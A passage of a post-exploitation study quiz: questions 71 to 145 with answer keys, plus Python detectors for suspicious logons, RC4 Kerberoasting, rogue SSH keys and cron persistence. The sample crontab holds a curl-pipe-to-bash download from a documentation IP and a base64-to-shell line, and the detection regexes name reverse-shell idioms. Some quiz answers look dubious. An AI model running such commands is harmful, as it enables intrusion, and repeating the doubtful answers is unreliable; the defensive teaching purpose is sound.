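    {"time": "2024-05-01T08:05:08", "id": 4625, "user": "frank", "src": "10.0.0.99", "logon_type": 3},
    {"time": "2024-05-01T08:05:10", "id": 4625, "user": "svc_backup", "src": "10.0.0.99", "logon_type": 3},
    {"time": "2024-05-01T08:06:30", "id": 4624, "user": "svc_backup", "src": "10.0.0.99", "logon_type": 3},
    {"time": "2024-05-01T08:10:00", "id": 4769, "user": "alice", "src": "10.0.0.5",
     "service": "krbtgt", "etype": 0x12},
    {"time": "2024-05-01T08:11:00", "id": 4769, "user": "alice", "src": "10.0.0.5",
     "service": "MSSQLSvc/db01.corp.local:1433", "etype": 0x17},
]


def detect_failed_then_success(events, threshold=5, window=timedelta(minutes=10)):
    """Per source address: at least `threshold` 4625s inside `window`, then a 4624."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):   # ISO timestamps sort as text
        if e["id"] in (4624, 4625):
            by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        failures = []                      # (time, user) still inside the window
        for e in evs:
            t = datetime.fromisoformat(e["time"])
            failures = [f for f in failures if t - f[0] <= window]
            if e["id"] == 4625:
                failures.append((t, e["user"]))
            elif len(failures) >= threshold:
                alerts.append({"src": src, "user": e["user"], "logon_type": e["logon_type"],
                               "failed": len(failures),
                               "spray": len({u for _, u in failures}) >= threshold})
                failures = []
    return alerts


def detect_rc4_tgs_requests(events):
    """4769 with ticket encryption type 0x17 (RC4-HMAC) for a non-krbtgt SPN.
    AES-only domains issue 0x11/0x12 tickets; an RC4 request is what
    Kerberoasting tools ask for so the ticket cracks faster."""
    return [e for e in events
            if e["id"] == 4769 and e.get("etype") == 0x17
            and not e.get("service", "").startswith("krbtgt")]
```

On the sample, 10.0.0.99 fails six logons across six accounts and then succeeds as svc_backup, which yields one alert with spray set; alice’s single interactive logon does not. The RC4 check returns only the MSSQLSvc request. Both rules are starting points: tune the window and threshold to the environment, and pair the etype rule with an allowlist of legacy services that genuinely still need RC4.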
71. What is the main purpose of PsExec in post-exploitation?
- A) Running commands remotely on Windows systems
- B) Extracting password hashes
- C) Manipulating Active Directory objects
- D) Conducting SQL Injection attacks
✅ Answer: A) Running commands remotely on Windows systems
Explanation: PsExec copies a service binary to the target’s ADMIN$ share and starts it over SMB, giving remote command execution with administrative credentials and no RDP session. On the target it leaves Event ID 7045 (a service was installed) in the System log.
72. What does net group "Domain Admins" /domain reveal in a compromised environment?
- A) The current firewall settings
- B) The list of domain administrator accounts
- C) A list of all active users
- D) The network interface configurations
✅ Answer: B) The list of domain administrator accounts
Explanation: Attackers use this command to enumerate high-privilege domain users.
73. How can an attacker use certutil maliciously?
- A) Downloading and decoding malware
- B) Manipulating DNS records
- C) Deleting system logs
- D) Creating fake domain certificates
✅ Answer: A) Downloading and decoding malware
Explanation: certutil -urlcache -f downloads a file and certutil -decode turns a base64-encoded payload back into a binary, so one trusted Microsoft binary handles both the download and the decoding; command-line logging for certutil with these flags is a common detection rule.
74. What is the purpose of “PowerSploit” in post-exploitation?
- A) A PowerShell framework for post-exploitation tasks
- B) A brute-force password cracker
- C) A tool for encrypting exfiltrated data
- D) A Linux privilege escalation tool
✅ Answer: A) A PowerShell framework for post-exploitation tasks
Explanation: PowerSploit contains modules for privilege escalation, credential dumping, and persistence.
75. What is the purpose of the “Sticky Keys Backdoor” technique?
- A) Launching a system shell from the login screen
- B) Bypassing anti-malware software
- C) Modifying Windows group policies
- D) Manipulating BIOS settings
✅ Answer: A) Launching a system shell from the login screen
Explanation: Attackers replace sethc.exe with cmd.exe, allowing unauthenticated access to a SYSTEM shell from the logon screen.
76. What is the role of svchost.exe in process injection attacks?
- A) It allows attackers to inject malicious payloads into a system process
- B) It is used for network reconnaissance
- C) It prevents privilege escalation
- D) It logs all system changes
✅ Answer: A) It allows attackers to inject malicious payloads into a system process
Explanation: Attackers inject malicious code into svchost.exe to evade security tools.
77. How does a “Token Stealing” attack work in Windows?
- A) By copying authentication tokens from memory to impersonate users
- B) By brute-forcing login credentials
- C) By modifying registry keys
- D) By injecting JavaScript into login forms
✅ Answer: A) By copying authentication tokens from memory to impersonate users
Explanation: Token Stealing allows an attacker to reuse existing authentication tokens for lateral movement.
78. What is the purpose of Invoke-Mimikatz in post-exploitation?
- A) Extracting credentials from memory
- B) Running a network scan
- C) Encrypting communication channels
- D) Modifying firewall rules
✅ Answer: A) Extracting credentials from memory
Explanation: Invoke-Mimikatz is a PowerShell script that calls Mimikatz for credential dumping.
79. How do attackers use rundll32.exe for stealthy execution?
- A) By executing malicious DLLs in a legitimate process
- B) By modifying the Windows kernel
- C) By disabling Windows updates
- D) By blocking network traffic
✅ Answer: A) By executing malicious DLLs in a legitimate process
Explanation: Attackers use rundll32.exe to load malicious DLLs, avoiding detection.
80. What does a “Silver Ticket” attack allow an attacker to do?
- A) Forge service tickets for Kerberos authentication
- B) Inject malicious JavaScript into webpages
- C) Capture NTLM hashes over SMB
- D) Modify domain group policies
✅ Answer: A) Forge service tickets for Kerberos authentication
Explanation: Silver Ticket attacks bypass authentication by forging Kerberos TGS tickets.
81. What command in Linux displays scheduled tasks?
- A) crontab -l
- B) netstat -an
- C) iptables -L
- D) whoami
✅ Answer: A) crontab -l
Explanation: crontab -l lists the current user’s cron jobs (crontab -l -u root for another user’s), which attackers may modify for persistence. System-wide entries live in /etc/crontab and /etc/cron.d and are not shown by crontab -l, so an audit has to read those files as well.
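An added example, not from the quiz, that audits the two Linux persistence spots from questions 3, 11 and 81 together: keys in authorized_keys that are not on an allowlist (matched by OpenSSH-style SHA256 fingerprint) and cron commands that download-and-pipe into a shell, run from /dev/shm or /tmp, decode an embedded base64 payload, or use a reverse-shell idiom. The key blobs, crontab lines and heuristics are constructed assumptions.

```python
"""Added example, not from the original quiz: auditing authorized_keys and
crontabs for planted persistence. The key blobs and cron lines are
constructed; the heuristics are assumptions to tune, not a standard."""
import base64
import hashlib
import re

KEY_RE = re.compile(
    r"^(?:(?P<opts>.*?)\s+)?(?P<type>(?:ssh|ecdsa|sk)-[\w@.-]+)\s+"
    r"(?P<blob>[A-Za-z0-9+/=]+)(?:\s+(?P<comment>.*))?$")

# Constructed inputs: the blobs are not real keys, just valid base64.
KNOWN_BLOB = base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(range(32))).decode()
ROGUE_BLOB = base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(range(32, 64))).decode()
SAMPLE_AUTHORIZED_KEYS = f"""# managed by config management
ssh-ed25519 {KNOWN_BLOB} alice@laptop
ssh-ed25519 {ROGUE_BLOB} root@localhost
"""
SAMPLE_CRONTAB = """# m h dom mon dow command
MAILTO=root
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://203.0.113.7/x.sh | bash
@reboot /dev/shm/.x/agent
*/10 * * * * echo L2Jpbi9iYXNo | base64 -d | sh
"""


def ssh_fingerprint(blob_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 key blob (ssh-keygen -lf)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit_authorized_keys(text: str, known_fingerprints: set[str]) -> list[dict]:
    """Keys whose fingerprint is not approved, noting whether they carry
    from=/command= restrictions (an unrestricted unknown key is the backdoor case)."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.match(line)
        if not m:
            continue
        fp = ssh_fingerprint(m["blob"])
        if fp not in known_fingerprints:
            restricted = bool(m["opts"] and re.search(r"from=|command=", m["opts"]))
            findings.append({"fingerprint": fp, "comment": m["comment"] or "", "restricted": restricted})
    return findings


CRON_RULES = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"), "downloads and pipes into a shell"),
    (re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/"), "runs a binary from a world-writable directory"),
    (re.compile(r"base64\s+(-d|--decode)"), "decodes an embedded base64 payload"),
    (re.compile(r"/dev/tcp/|\bnc\b.*-e\s|\bncat\b"), "reverse-shell idiom"),
]


def audit_crontab(text: str, system_format: bool = False) -> list[dict]:
    """Score each cron entry's command. system_format=True expects the extra
    user column used by /etc/crontab and /etc/cron.d/*."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue   # comments and MAILTO=/PATH= style assignments
        fields = (1 if line.startswith("@") else 5) + (1 if system_format else 0)
        parts = line.split(None, fields)
        if len(parts) <= fields:
            continue
        command = parts[-1]
        reasons = [why for rule, why in CRON_RULES if rule.search(command)]
        if reasons:
            findings.append({"schedule": " ".join(parts[:fields]), "command": command, "reasons": reasons})
    return findings
```

Feeding the allowlist from the fingerprints your configuration management deploys (ssh-keygen -lf prints the same SHA256 form) turns the first function into a drift check; the second is meant to be run over every user’s crontab -l output plus /etc/crontab and /etc/cron.d, since the quiz’s crontab -l alone misses the system-wide entries.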
82. What does the net use command do in Windows post-exploitation?
- A) Establishes a connection to remote SMB shares
- B) Dumps memory contents
- C) Creates a new domain admin account
- D) Runs PowerShell scripts
✅ Answer: A) Establishes a connection to remote SMB shares
Explanation: net use maps remote SMB shares, which can be used for lateral movement and data collection.
83. What is an advantage of using a Web Shell in post-exploitation?
- A) Provides persistent access through a web interface
- B) Encrypts the entire filesystem
- C) Forces all users to change their passwords
- D) Disables security software
✅ Answer: A) Provides persistent access through a web interface
Explanation: Attackers use web shells (e.g., c99.php) to execute commands remotely.
84. What is an example of a persistence mechanism on Windows using DLL hijacking?
- A) Dropping a malicious DLL into a trusted directory
- B) Using a SQL Injection attack
- C) Running a phishing campaign
- D) Exploiting a router vulnerability
✅ Answer: A) Dropping a malicious DLL into a trusted directory
Explanation: Attackers place malicious DLLs in trusted locations, tricking the system into loading them.
85. What does at.exe allow an attacker to do?
- A) Schedule tasks for later execution
- B) Modify Active Directory policies
- C) Extract password hashes
- D) Scan for open ports
✅ Answer: A) Schedule tasks for later execution
Explanation: at.exe scheduled commands for later execution as SYSTEM and was a classic persistence tool; it is deprecated and removed from current Windows versions, where schtasks.exe does the same job.
86. What does the “Golden Ticket” attack allow an attacker to do?
- A) Create forged Kerberos TGTs for unrestricted access
- B) Inject malicious payloads into kernel processes
- C) Brute-force administrator passwords
- D) Disable Windows Defender
✅ Answer: A) Create forged Kerberos TGTs for unrestricted access
Explanation: Golden Ticket attacks allow attackers to generate Kerberos TGTs, giving persistent domain access.
87. What is the main goal of “Island Hopping” in post-exploitation?
- A) Moving laterally across multiple connected organizations
- B) Encrypting user data for ransom
- C) Exploiting buffer overflows for privilege escalation
- D) Hijacking network traffic using ARP spoofing
✅ Answer: A) Moving laterally across multiple connected organizations
Explanation: Island Hopping involves using one compromised network to attack another connected network.
88. Which PowerShell command allows an attacker to execute remote scripts without dropping files on disk?
- A) Invoke-WebRequest
- B) Get-Process
- C) netsh firewall off
- D) whoami /priv
✅ Answer: A) Invoke-WebRequest
Explanation: Attackers use Invoke-WebRequest to download and execute remote payloads without writing them to disk.
89. What persistence technique involves creating a malicious BHO (Browser Helper Object) in Windows?
- A) DLL Hijacking
- B) Registry Run Key Injection
- C) Browser Exploit Persistence
- D) BHO-based Persistence
✅ Answer: D) BHO-based Persistence
Explanation: BHOs (Browser Helper Objects) are DLLs that run within Internet Explorer, allowing attackers to maintain access.
90. What is the main advantage of using a Domain Controller (DC) as a persistence mechanism?
- A) It allows for stealthy malware execution
- B) It provides long-term access with full network control
- C) It enables brute-force attacks
- D) It prevents antivirus detection
✅ Answer: B) It provides long-term access with full network control
Explanation: Compromising a DC allows attackers to control authentication, policies, and users across the domain.
91. Which tool is commonly used to extract LSA secrets from a Windows machine?
- A) BloodHound
- B) Mimikatz
- C) Metasploit
- D) Hydra
✅ Answer: B) Mimikatz
Explanation: Mimikatz extracts LSA secrets, Kerberos tickets, and NTLM hashes for privilege escalation.
92. What attack abuses the SAM and SYSTEM registry hives to retrieve hashed credentials?
- A) Credential Dumping
- B) SQL Injection
- C) NTLM Relay Attack
- D) Pass-the-Ticket
✅ Answer: A) Credential Dumping
Explanation: Attackers use SAM & SYSTEM hive extraction to retrieve hashed passwords.
93. What is a common persistence technique using Microsoft Office macros?
- A) Embedding malicious VBA code into Office documents
- B) Injecting payloads into Windows Defender
- C) Disabling PowerShell execution policies
- D) Modifying group policy settings
✅ Answer: A) Embedding malicious VBA code into Office documents
Explanation: Attackers use Office macros to execute malware when documents are opened.
94. How does an attacker use “AppLocker Bypass” for post-exploitation?
- A) By using whitelisted system binaries to execute malicious code
- B) By modifying firewall rules
- C) By brute-forcing administrative credentials
- D) By disabling event logs
✅ Answer: A) By using whitelisted system binaries to execute malicious code
Explanation: Attackers bypass AppLocker by abusing trusted executables to execute payloads.
95. What is the primary use of “Token Duplication” in post-exploitation?
- A) To impersonate high-privilege users
- B) To create new user accounts
- C) To encrypt network traffic
- D) To brute-force passwords
✅ Answer: A) To impersonate high-privilege users
Explanation: Token Duplication allows attackers to steal high-privilege user access tokens.
96. What does the “Skeleton Key” malware do in a post-exploitation scenario?
- A) Enables domain-wide authentication bypass
- B) Encrypts system files for ransom
- C) Scans for open ports on a network
- D) Injects malicious JavaScript into websites
✅ Answer: A) Enables domain-wide authentication bypass
Explanation: Skeleton Key malware allows attackers to bypass Active Directory authentication.
97. What does an attacker achieve with “Registry Run Key Injection”?
- A) Persistent execution of malicious payloads at system startup
- B) Brute-forcing password hashes
- C) Creating new firewall rules
- D) Scanning network devices
✅ Answer: A) Persistent execution of malicious payloads at system startup
Explanation: Registry Run Key Injection ensures that malicious payloads execute every time the system boots.
98. What does an attacker achieve using “NTLM Relay Attacks”?
- A) Authenticate to services without cracking passwords
- B) Bypass file system permissions
- C) Conduct brute-force login attempts
- D) Modify Windows firewall settings
✅ Answer: A) Authenticate to services without cracking passwords
Explanation: NTLM Relay Attacks allow authentication without knowing the password, exploiting SMB signing misconfigurations.
99. What technique allows attackers to replace a legitimate Windows service executable with a malicious one?
- A) Service Binary Path Hijacking
- B) DLL Injection
- C) Phishing Attack
- D) Kerberoasting
✅ Answer: A) Service Binary Path Hijacking
Explanation: Attackers replace the binary path of a legitimate Windows service with a malicious executable, ensuring persistence.
100. What does “Code Cave Injection” involve?
- A) Injecting malicious code into unused memory space of an executable
- B) Injecting JavaScript into login forms
- C) Manipulating kernel memory
- D) Replacing system drivers
✅ Answer: A) Injecting malicious code into unused memory space of an executable
Explanation: Code Cave Injection places malicious code in an unused portion of an executable’s memory, allowing stealthy execution.
101. What is the primary goal of using “Domain Replication” attacks in post-exploitation?
- A) Extracting password hashes from Active Directory
- B) Running privilege escalation exploits
- C) Deploying ransomware on multiple machines
- D) Modifying Group Policy settings
✅ Answer: A) Extracting password hashes from Active Directory
Explanation: Domain Replication attacks (e.g., DCSync) abuse Active Directory replication to steal NTLM hashes of all domain users.
102. What is the function of a “C2 beacon” in a post-exploitation framework?
- A) Establishes communication between the attacker and compromised host
- B) Scans for vulnerabilities in web applications
- C) Creates new user accounts on the system
- D) Encrypts system logs
✅ Answer: A) Establishes communication between the attacker and compromised host
Explanation: C2 (Command & Control) beacons allow attackers to remotely send commands and receive data from compromised machines.
103. What is the advantage of using “Reflective DLL Injection” in post-exploitation?
- A) Executes malicious DLLs in memory without writing to disk
- B) Runs scripts on Linux systems
- C) Prevents antivirus from detecting malware
- D) Bypasses brute-force protection mechanisms
✅ Answer: A) Executes malicious DLLs in memory without writing to disk
Explanation: Reflective DLL Injection loads a malicious DLL into memory without needing it to be written on disk, reducing AV detection.
104. How can attackers use “Kerberos Overpass-the-Hash” attacks?
- A) Use NTLM hashes to request Kerberos tickets
- B) Modify Active Directory group policies
- C) Intercept network traffic
- D) Execute JavaScript payloads remotely
✅ Answer: A) Use NTLM hashes to request Kerberos tickets
Explanation: Kerberos Overpass-the-Hash allows attackers to use NTLM hashes to authenticate via Kerberos.
105. What is the purpose of “DLL Search Order Hijacking”?
- A) Forcing a program to load a malicious DLL instead of a legitimate one
- B) Disabling Windows firewall rules
- C) Manipulating NTFS file permissions
- D) Deleting Windows event logs
✅ Answer: A) Forcing a program to load a malicious DLL instead of a legitimate one
Explanation: DLL Search Order Hijacking abuses how Windows loads DLLs, making an application execute a malicious DLL instead.
106. What technique allows attackers to steal plaintext passwords stored in memory?
- A) Credential Dumping
- B) SSH Brute-Forcing
- C) DNS Tunneling
- D) Lateral Movement
✅ Answer: A) Credential Dumping
Explanation: Credential Dumping extracts plaintext passwords and hashes from memory (e.g., using Mimikatz).
107. What tool is commonly used for extracting passwords stored in web browsers?
- A) LaZagne
- B) Hydra
- C) Metasploit
- D) sqlmap
✅ Answer: A) LaZagne
Explanation: LaZagne extracts saved passwords from web browsers, databases, and system credentials.
108. How can attackers use “WMI Event Subscription” for persistence?
- A) Automatically execute malicious payloads when specific system events occur
- B) Modify network firewall rules
- C) Exploit DNS misconfigurations
- D) Scan for vulnerabilities in SMB shares
✅ Answer: A) Automatically execute malicious payloads when specific system events occur
Explanation: WMI Event Subscription sets up triggers to run malicious scripts or binaries whenever a system event occurs.
109. What is “Service Failure Recovery Persistence” in Windows?
- A) Configuring a Windows service to restart and execute malicious code on failure
- B) Injecting malware into system processes
- C) Hijacking SMB sessions
- D) Modifying DNS entries
✅ Answer: A) Configuring a Windows service to restart and execute malicious code on failure
Explanation: Attackers configure Windows services to restart and run malicious commands upon failure.
110. How does an attacker use “PowerShell downgrade attacks” in post-exploitation?
- A) Bypass security restrictions by forcing PowerShell to run in legacy mode
- B) Prevent PowerShell logging
- C) Encrypt stolen credentials
- D) Modify Windows registry settings
✅ Answer: A) Bypass security restrictions by forcing PowerShell to run in legacy mode
Explanation: PowerShell downgrade attacks force PowerShell to execute scripts in an older, less-secure mode.
111. What persistence mechanism exploits “Group Policy Preferences (GPP)”?
- A) Extracting plaintext credentials from Group Policy XML files
- B) Injecting malicious JavaScript into GPO rules
- C) Using scheduled tasks for executing payloads
- D) Modifying Windows bootloader
✅ Answer: A) Extracting plaintext credentials from Group Policy XML files
Explanation: GPP stores credentials in XML files, allowing attackers to extract plaintext passwords.
112. What is the primary function of “Process Hollowing” in post-exploitation?
- A) Replacing a legitimate process’s memory with malicious code
- B) Creating fake system accounts
- C) Conducting brute-force attacks
- D) Encrypting all files on the system
✅ Answer: A) Replacing a legitimate process’s memory with malicious code
Explanation: Process Hollowing allows malware to execute inside a trusted process, making it harder to detect.
113. How does “DNS Hijacking” help in maintaining access?
- A) Redirecting network traffic to attacker-controlled domains
- B) Encrypting all DNS requests
- C) Preventing users from accessing the internet
- D) Generating fake HTTP headers
✅ Answer: A) Redirecting network traffic to attacker-controlled domains
Explanation: DNS Hijacking modifies DNS settings, allowing attackers to redirect victims to malicious websites.
114. What is a common method attackers use to exfiltrate data while evading detection?
- A) DNS Tunneling
- B) SQL Injection
- C) Cross-Site Scripting
- D) ARP Poisoning
✅ Answer: A) DNS Tunneling
Explanation: DNS Tunneling sends data through DNS queries, bypassing network security controls.
115. What is the goal of “Windows Sticky Notes Injection” in post-exploitation?
- A) Running malicious commands via sethc.exe
- B) Using Windows Sticky Notes as a persistence mechanism
- C) Injecting code into notepad.exe
- D) Stealing user credentials
✅ Answer: B) Using Windows Sticky Notes as a persistence mechanism
Explanation: Attackers modify Sticky Notes configurations to launch malicious scripts upon execution.
116. What attack abuses “NTFS Alternate Data Streams (ADS)”?
- A) Hiding malicious payloads inside legitimate files without changing file size
- B) Injecting malware into system logs
- C) Manipulating DNS responses
- D) Creating fake SSL certificates
✅ Answer: A) Hiding malicious payloads inside legitimate files without changing file size
Explanation: ADS in NTFS allows malware to hide inside legitimate files, remaining undetected.
117. How does “LSASS Dumping” help attackers?
- A) Extracts password hashes and Kerberos tickets from memory
- B) Hides malicious processes from Task Manager
- C) Brute-forces Active Directory accounts
- D) Modifies SMB authentication
✅ Answer: A) Extracts password hashes and Kerberos tickets from memory
Explanation: LSASS Dumping retrieves password hashes and Kerberos tickets for further exploitation.
118. What is the primary goal of “Session Hijacking” in post-exploitation?
- A) Gaining unauthorized access by stealing an active session token
- B) Brute-forcing login credentials
- C) Encrypting session cookies
- D) Modifying the system’s boot process
✅ Answer: A) Gaining unauthorized access by stealing an active session token
Explanation: Session Hijacking involves stealing authentication tokens to impersonate a legitimate user without needing credentials.
119. How does an attacker use “BitLocker Abuse” for persistence?
- A) Encrypting critical system files and demanding ransom
- B) Modifying Windows kernel settings
- C) Injecting payloads into system processes
- D) Modifying user permissions
✅ Answer: A) Encrypting critical system files and demanding ransom
Explanation: Attackers may use BitLocker to encrypt files, locking out legitimate users while maintaining control over the system.
120. What is a key characteristic of “Heap Spraying” in post-exploitation?
- A) Filling memory with predictable data to facilitate exploitation
- B) Encrypting all stored credentials
- C) Bypassing network firewall rules
- D) Stealing password hashes
✅ Answer: A) Filling memory with predictable data to facilitate exploitation
Explanation: Heap Spraying is an exploit technique that prepares memory in a predictable way to increase exploit reliability.
121. How does “Hook Injection” work in post-exploitation?
- A) Modifying API calls to execute malicious code in targeted processes
- B) Creating fake login prompts to steal credentials
- C) Modifying firewall rules to allow malicious traffic
- D) Hiding malware inside system logs
✅ Answer: A) Modifying API calls to execute malicious code in targeted processes
Explanation: Hook Injection manipulates API function calls to inject and execute malicious code stealthily.
122. What persistence method involves modifying the Windows Boot Configuration Data (BCD)?
- A) Bootkit Persistence
- B) DLL Injection
- C) Token Hijacking
- D) Phishing Attack
✅ Answer: A) Bootkit Persistence
Explanation: Bootkits modify the BCD or Master Boot Record (MBR) to load malware before the OS boots.
123. What attack involves intercepting and modifying legitimate API calls?
- A) API Hooking
- B) DLL Hijacking
- C) Pass-the-Hash
- D) Lateral Movement
✅ Answer: A) API Hooking
Explanation: API Hooking allows attackers to modify function calls in real-time, injecting or redirecting execution.
124. What is the main goal of “Clipboard Hijacking” in post-exploitation?
- A) Monitoring and modifying clipboard data to steal sensitive information
- B) Disabling clipboard functionality on remote desktops
- C) Extracting network traffic logs
- D) Encrypting clipboard contents
✅ Answer: A) Monitoring and modifying clipboard data to steal sensitive information
Explanation: Clipboard Hijacking captures copied passwords, credit card numbers, or cryptocurrency wallet addresses.
125. How does “Reverse Shell Encoding” help evade detection?
- A) Obfuscating payloads to bypass antivirus and intrusion detection systems
- B) Encrypting shell commands before execution
- C) Running exploits inside a virtualized container
- D) Modifying system BIOS
✅ Answer: A) Obfuscating payloads to bypass antivirus and intrusion detection systems
Explanation: Reverse Shell Encoding disguises malicious commands, making detection harder.
126. What is “Process Doppelgänging” used for in post-exploitation?
- A) Running malicious code within a legitimate process without detection
- B) Encrypting all system files
- C) Conducting brute-force attacks against user accounts
- D) Spoofing DNS requests
✅ Answer: A) Running malicious code within a legitimate process without detection
Explanation: Process Doppelgänging exploits Windows features to execute malware in a legitimate-looking process.
127. How do attackers abuse “Remote Desktop Protocol (RDP) Shadowing” for persistence?
- A) Hijacking active RDP sessions without the user noticing
- B) Scanning for open RDP ports on the network
- C) Disabling multi-factor authentication on RDP servers
- D) Bypassing firewall restrictions
✅ Answer: A) Hijacking active RDP sessions without the user noticing
Explanation: RDP Shadowing allows attackers to view and control an active session without alerting the user.
128. What is a key characteristic of “Timestomping” in post-exploitation?
- A) Modifying file timestamps to evade forensic detection
- B) Injecting payloads into Windows time synchronization services
- C) Exploiting time-based authentication tokens
- D) Manipulating system logs
✅ Answer: A) Modifying file timestamps to evade forensic detection
Explanation: Timestomping alters creation, modification, and access timestamps to make malware appear old and avoid detection.
129. What is “Signed Binary Proxy Execution” used for?
- A) Running malicious payloads using trusted Microsoft-signed binaries
- B) Encrypting sensitive user credentials
- C) Modifying Windows Boot Loaders
- D) Conducting phishing attacks
✅ Answer: A) Running malicious payloads using trusted Microsoft-signed binaries
Explanation: Signed Binary Proxy Execution abuses trusted Windows executables (e.g., mshta.exe, regsvr32.exe) to execute malware.
130. How does an attacker abuse “Scheduled Task Hijacking” for persistence?
- A) Modifying existing scheduled tasks to execute malicious scripts
- B) Encrypting scheduled task logs
- C) Modifying BIOS settings
- D) Disabling antivirus software
✅ Answer: A) Modifying existing scheduled tasks to execute malicious scripts
Explanation: Scheduled Task Hijacking allows attackers to alter legitimate task configurations for persistence.
131. What does “Kernel Mode Rootkit” do in post-exploitation?
- A) Hides malicious activity by running in the OS kernel
- B) Encrypts user files for ransom
- C) Injects JavaScript into webpages
- D) Conducts SQL Injection attacks
✅ Answer: A) Hides malicious activity by running in the OS kernel
Explanation: Kernel Mode Rootkits provide stealthy persistence by modifying OS-level processes.
132. How do attackers use “LDAP Enumeration” in post-exploitation?
- A) Gather user and group information from Active Directory
- B) Inject malicious payloads into database queries
- C) Modify registry keys to disable authentication logs
- D) Conduct brute-force attacks against user passwords
✅ Answer: A) Gather user and group information from Active Directory
Explanation: LDAP Enumeration provides valuable intelligence on users, groups, and permissions within a Windows domain.
133. What is the primary goal of “Token Impersonation” in post-exploitation?
- A) Gaining higher privileges by using a stolen authentication token
- B) Injecting malicious JavaScript into a web application
- C) Encrypting system logs to evade detection
- D) Modifying Active Directory group policies
✅ Answer: A) Gaining higher privileges by using a stolen authentication token
Explanation: Token Impersonation allows an attacker to use a stolen security token to execute commands as a higher-privilege user.
134. How does an attacker use “Winlogon Helper DLL Injection” for persistence?
- A) Injecting malicious DLLs into the Winlogon.exe process to maintain access
- B) Modifying login credentials stored in the registry
- C) Exploiting a buffer overflow in Windows login services
- D) Encrypting user authentication logs
✅ Answer: A) Injecting malicious DLLs into the Winlogon.exe process to maintain access
Explanation: Attackers inject malicious DLLs into Winlogon.exe, ensuring execution every time a user logs in.
135. What is the main purpose of “System Binary Proxy Execution”?
- A) Using trusted system binaries to execute malicious code
- B) Modifying system log timestamps to hide activity
- C) Injecting shellcode into user-mode applications
- D) Exploiting kernel vulnerabilities for privilege escalation
✅ Answer: A) Using trusted system binaries to execute malicious code
Explanation: System Binary Proxy Execution abuses trusted Windows binaries (e.g., mshta.exe, regsvr32.exe) to execute malware.
136. What is the purpose of “Web Cache Poisoning” in post-exploitation?
- A) Injecting malicious content into cached web responses to target users
- B) Hiding malware inside encrypted SSL sessions
- C) Bypassing security measures by modifying DNS settings
- D) Disabling Content Security Policy (CSP)
✅ Answer: A) Injecting malicious content into cached web responses to target users
Explanation: Web Cache Poisoning manipulates cached web content, allowing attackers to serve malicious responses to victims.
137. How does “AppInit DLL Injection” help an attacker maintain persistence?
- A) Loading a malicious DLL into every user-mode process that uses user32.dll
- B) Exploiting API misconfigurations to escalate privileges
- C) Injecting shellcode into browser processes
- D) Manipulating Windows boot sequence
✅ Answer: A) Loading a malicious DLL into every user-mode process that uses user32.dll
Explanation: AppInit DLL Injection ensures malicious DLLs load into every process using user32.dll, maintaining persistence.
138. What is the purpose of “Reverse Port Forwarding” in post-exploitation?
- A) Establishing access from the victim’s internal network back to the attacker’s machine
- B) Modifying remote firewall configurations
- C) Encrypting communication between an attacker and the victim
- D) Spoofing ARP requests to intercept network traffic
✅ Answer: A) Establishing access from the victim’s internal network back to the attacker’s machine
Explanation: Reverse Port Forwarding allows an attacker to bypass NAT/firewall restrictions and maintain remote access.
139. How do attackers use “LOLBins” (Living Off the Land Binaries) for post-exploitation?
- A) Executing malicious payloads using trusted system binaries
- B) Modifying Active Directory group policies
- C) Conducting brute-force attacks against user passwords
- D) Injecting exploits into kernel-mode drivers
✅ Answer: A) Executing malicious payloads using trusted system binaries
Explanation: LOLBins (e.g., certutil.exe, mshta.exe, rundll32.exe) are trusted binaries used for malicious execution.
140. How does “Ghosting” help attackers evade detection?
- A) Creating a file that appears deleted but is still accessible
- B) Masking a malicious process as a legitimate one
- C) Modifying the BIOS to execute malware before the OS loads
- D) Running payloads in a sandbox environment
✅ Answer: A) Creating a file that appears deleted but is still accessible
Explanation: Ghosting allows an attacker to create files that appear deleted but remain accessible, bypassing forensic tools.
141. What is the purpose of “UAC Bypass” in post-exploitation?
- A) Running malware with administrative privileges without triggering User Account Control prompts
- B) Injecting malicious scripts into Windows event logs
- C) Modifying DNS settings to redirect user traffic
- D) Exploiting buffer overflows in Windows security policies
✅ Answer: A) Running malware with administrative privileges without triggering User Account Control prompts
Explanation: UAC Bypass exploits whitelisted executables to elevate privileges without user interaction.
142. How does “Process Hollowing” help attackers evade detection?
- A) Injecting malicious code into a legitimate process, replacing its memory space
- B) Executing PowerShell commands without logging
- C) Spoofing IP addresses in network traffic
- D) Encrypting all user data before exfiltration
✅ Answer: A) Injecting malicious code into a legitimate process, replacing its memory space
Explanation: Process Hollowing allows malware to execute under a trusted process name, evading detection.
143. What is “ASR Bypass” in Windows security evasion?
- A) Disabling Attack Surface Reduction (ASR) rules to allow malicious execution
- B) Exploiting SQL vulnerabilities to extract data
- C) Injecting exploits into Bluetooth devices
- D) Modifying Active Directory policies
✅ Answer: A) Disabling Attack Surface Reduction (ASR) rules to allow malicious execution
Explanation: ASR Bypass allows attackers to disable Microsoft’s Attack Surface Reduction rules, reducing security controls.
144. How do attackers use “VBA Stomping” in malware delivery?
- A) Embedding malicious macros in Microsoft Office documents without detection
- B) Modifying the Windows registry to execute malware
- C) Spoofing legitimate email addresses for phishing attacks
- D) Brute-forcing administrator passwords
✅ Answer: A) Embedding malicious macros in Microsoft Office documents without detection
Explanation: VBA Stomping hides malicious macros in Office documents, avoiding signature-based detection.
145. What is the purpose of “Password Spraying” in post-exploitation?
- A) Attempting a few commonly used passwords across many accounts to avoid detection
- B) Brute-forcing a single account with multiple password attempts
- C) Encrypting user passwords in Active Directory
- D) Injecting JavaScript into login pages
✅ Answer: A) Attempting a few commonly used passwords across many accounts to avoid detection
Explanation: Password Spraying avoids account lockouts by testing weak passwords against multiple users.
